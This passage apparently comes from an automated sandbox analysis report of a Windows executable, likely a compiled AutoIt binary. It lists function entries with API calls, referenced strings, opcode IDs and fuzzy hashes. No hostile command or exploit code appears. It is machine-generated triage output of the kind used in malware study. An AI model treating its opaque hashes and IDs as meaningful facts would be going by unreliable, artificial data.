                                                                    • Instruction Fuzzy Hash: A8410A74A0130A9FDB54CFA9C981BDABBF9FB48300F50016AEE44AB346D771A951DF90
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 01056B17
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01056B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    • Opcode ID: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
                                                                    • Instruction ID: 92d820556a7694cb3d8e8b50023602b456eb12d6c3fcc4d43abc5737c2d0b3be
                                                                    • Opcode Fuzzy Hash: e84408ac4bdacf981605322d4348089470d978ccf33756f7ce00b25fccc4edd0
                                                                    • Instruction Fuzzy Hash: 6331BE71200604AEEB519F69CC90BFB77F9FF48720F50861AFDE587190DA36A881DB60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032911
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0103294C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 9ce105a05601ce552cb43bc04b91988eda115a1a96dc882f286745d88b3d9501
                                                                    • Instruction ID: 1f52971f2866b05bd12b1b26b90779ba8590e7648a9bea48690971eff7160572
                                                                    • Opcode Fuzzy Hash: 9ce105a05601ce552cb43bc04b91988eda115a1a96dc882f286745d88b3d9501
                                                                    • Instruction Fuzzy Hash: A631BD31A00309ABEB65CE5CCC85BAEBFECEF85390F14009AEAC5A61A1DB749540CB51
                                                                    APIs
                                                                    • __snwprintf.LIBCMT ref: 01043A66
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf_memmove
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 3506404897-2584243854
                                                                    • Opcode ID: 12fc83994ea0485d4810b8b59168ccd79d302fee905c4a7df545c92d55b31c14
                                                                    • Instruction ID: c53ce1e6430cdeab2498b87260f7a135d962f91e34774760115db71d9af8a1d8
                                                                    • Opcode Fuzzy Hash: 12fc83994ea0485d4810b8b59168ccd79d302fee905c4a7df545c92d55b31c14
                                                                    • Instruction Fuzzy Hash: 9D21F570A40229AFCF10FF64CC81EAE7BBABF44300F44446AE984AF241DB34E911DB61
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01056761
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0105676C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    • Opcode ID: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
                                                                    • Instruction ID: d5b3312e26ca621424cd4236e6f86c798d79ab7487396fe438662fcc3d437911
                                                                    • Opcode Fuzzy Hash: 253fefd9b4c5aae1cc4daa1bede2b97a6b98a58e16c7129917dd0264e22dfcad
                                                                    • Instruction Fuzzy Hash: 5A11B6752002096FEFA29E58CC84EBB77AAFB48364F500129FD9497291E6369C5187A0
                                                                    APIs
                                                                      • Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
                                                                      • Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
                                                                      • Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91
                                                                    • GetWindowRect.USER32(00000000,?), ref: 01056C71
                                                                    • GetSysColor.USER32(00000012), ref: 01056C8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
                                                                    • Instruction ID: 02ba8245a34ad65a38f358c39bb50ce5fe979b07f0d30299eadb77a915384c94
                                                                    • Opcode Fuzzy Hash: d5b3d8cd397ea8d0e30f86b68bc25e1dc4dd1f985c673380ac15d6dd43f181a6
                                                                    • Instruction Fuzzy Hash: 1421177291020AAFDB55DFA8C845AFA7BA9FB08314F004619FD95D3240D63AE850DB60
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 010569A2
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010569B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
                                                                    • Instruction ID: 30e214d0f304926f006e0321028472136342819c5479483759bfa23fe5fa2873
                                                                    • Opcode Fuzzy Hash: e69d319d69e7ce3cec9ac6a5f9e22dc3510e5fe35e1b2be8e981d1f464f9b04c
                                                                    • Instruction Fuzzy Hash: 97116D71100205ABEF919E68DC40AEB37BEEB053B8F904714FDE1971D0C636DC519760
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 01032A22
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01032A41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
                                                                    • Instruction ID: 1aea94964e54bb527d40103413a70d03625c6bb463c4b2c3d33cf29e9ca6716b
                                                                    • Opcode Fuzzy Hash: 1771b0fbf49e5ff808082453a02041e60fdabf5d2186e503c2602c35636d6cb3
                                                                    • Instruction Fuzzy Hash: FE110832901614ABEF71DE5CDC44BAE7BFCABC6200F144062EAD5E7290D774A907C791
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0104222C
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01042255
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 805df1931087ccb65408bdb13773fcabba68fc70664b90934c12f1947b9c89c2
                                                                    • Instruction ID: 2aed56a9d8b99cb1bfa0deec81847c3216840a6a0ad17f92b1068e2521529617
                                                                    • Opcode Fuzzy Hash: 805df1931087ccb65408bdb13773fcabba68fc70664b90934c12f1947b9c89c2
                                                                    • Instruction Fuzzy Hash: 0211C2B0641225FBDB258F55ADC8FBBFFA8FF06651F00827AFA9596000D2705990C6F0
                                                                    APIs
                                                                      • Part of subcall function 01047FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,01047DB3,?,00000000,?,?), ref: 0104800D
                                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01047DB6
                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 01047DF3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 2496851823-2422070025
                                                                    • Opcode ID: d0484822aefebe9f5503a8ed90d0fb602a71f1733df698138d57d96c3a7031f3
                                                                    • Instruction ID: 1a0072147f30b1f6b17c84ea4ecc587061aa12bcbe770deb7da6fde06605c5e3
                                                                    • Opcode Fuzzy Hash: d0484822aefebe9f5503a8ed90d0fb602a71f1733df698138d57d96c3a7031f3
                                                                    • Instruction Fuzzy Hash: 6211C87550021AABDB20AF68CC85FFEB775FF14320F10466BEA919B2D1DB72A810C791
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01028E73
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: d6a68f8139c936472cf1dbf358702eb677be55a06586095822609473fcea969e
                                                                    • Instruction ID: 516e49ba30b9c514c764518cf87c8fce809a683a6c41f1aad3d8925e8c9ae13a
                                                                    • Opcode Fuzzy Hash: d6a68f8139c936472cf1dbf358702eb677be55a06586095822609473fcea969e
                                                                    • Instruction Fuzzy Hash: 0301F575641229EB9F14FBA4CC518FE77AAAF15320B04460AF8B15B3E1EE355808D650
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 01028D6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: 6e8557d004c0067d86c23f6b4fb174cbcc9b4cdff917a407ee396f6bfc6105fb
                                                                    • Instruction ID: b3c4035d9125729275639c7d58c3ce42ab4c24e03fce3335736d5b13dfd251f5
                                                                    • Opcode Fuzzy Hash: 6e8557d004c0067d86c23f6b4fb174cbcc9b4cdff917a407ee396f6bfc6105fb
                                                                    • Instruction Fuzzy Hash: 14014275B4021AABDB14FBA0CD52EFF77E9DF15300F14001AF88267291EE298A0CA271
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 01028DEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 372448540-1403004172
                                                                    • Opcode ID: e2fd502c9bcda61162147a9e8aef6b1e45b07804d735b0a4a4811282fa1dc3bb
                                                                    • Instruction ID: 8096bca8ade02f33cee2c02e7aba2ed59f07be1ba5d3e00f05139f5ff0a24315
                                                                    • Opcode Fuzzy Hash: e2fd502c9bcda61162147a9e8aef6b1e45b07804d735b0a4a4811282fa1dc3bb
                                                                    • Instruction Fuzzy Hash: 3D01F275B4121AA7DB10FAA8CD51EFF77E99F21300F14401AF88267292DA298A0CA271
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: 53b12c57494b8c3bb233d28da58c95770dc9708f5ab8e7c0d5f9fec54029e661
                                                                    • Instruction ID: 2d2a6f17cf4ff2cbbc25b3b04c4bef222bf7d605e884d8b3de06496bd0c31148
                                                                    • Opcode Fuzzy Hash: 53b12c57494b8c3bb233d28da58c95770dc9708f5ab8e7c0d5f9fec54029e661
                                                                    • Instruction Fuzzy Hash: 48E0D83260432D2BD720AA99EC49FA7F7ECEB85B70F05006BFD84D7041D5659A4587E0
                                                                    APIs
                                                                      • Part of subcall function 0100B314: _memset.LIBCMT ref: 0100B321
                                                                      • Part of subcall function 00FF0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0100B2F0,?,?,?,00FD100A), ref: 00FF0945
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00FD100A), ref: 0100B2F4
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FD100A), ref: 0100B303
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0100B2FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3158253471-631824599
                                                                    • Opcode ID: 6378845503e3954a0dfcec5d2070738be1762d80869149c3a3afd7702818b7b1
                                                                    • Instruction ID: c9a64aec96950ef821cb951909b3eb29a8cfa7f1c3ea66ce1472629a9721d966
                                                                    • Opcode Fuzzy Hash: 6378845503e3954a0dfcec5d2070738be1762d80869149c3a3afd7702818b7b1
                                                                    • Instruction Fuzzy Hash: ABE039746007018AE7329F29D4083467BE8AF00304F10CD6DE8C6C7786EBB99444CBA1
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 01011775
                                                                      • Part of subcall function 0104BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0101195E,?), ref: 0104BFFE
                                                                      • Part of subcall function 0104BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0104C010
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0101196D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 582185067-3257408948
                                                                    • Opcode ID: 7957b019982f5a472a6af958edb1e504bb95caad195261198f99685c5b9afe13
                                                                    • Instruction ID: 606009f0ca9eb3532cbb055020fc2987593a82f48b916aa13199970ec3624398
                                                                    • Opcode Fuzzy Hash: 7957b019982f5a472a6af958edb1e504bb95caad195261198f99685c5b9afe13
                                                                    • Instruction Fuzzy Hash: 78F0C071800109DFDB29DBA5C598AED7BF8BB18301F540095E385A2194DB7A8F44CF61
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0105596E
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01055981
                                                                      • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: f820722df6f04f0cf38263d46eb8bddeca374bf86da77b88ea41ada58032c5de
                                                                    • Instruction ID: de1a725593e6c9fa4311ae87df147d40b3127e5677a15bb6c7991cc8f308a2cd
                                                                    • Opcode Fuzzy Hash: f820722df6f04f0cf38263d46eb8bddeca374bf86da77b88ea41ada58032c5de
                                                                    • Instruction Fuzzy Hash: ABD0C935384312B7E774BA719C0EFD77A18AB54B50F000829B3C9AB1D4C9E99800C764
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010559AE
                                                                    • PostMessageW.USER32(00000000), ref: 010559B5
                                                                      • Part of subcall function 01035244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010352BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
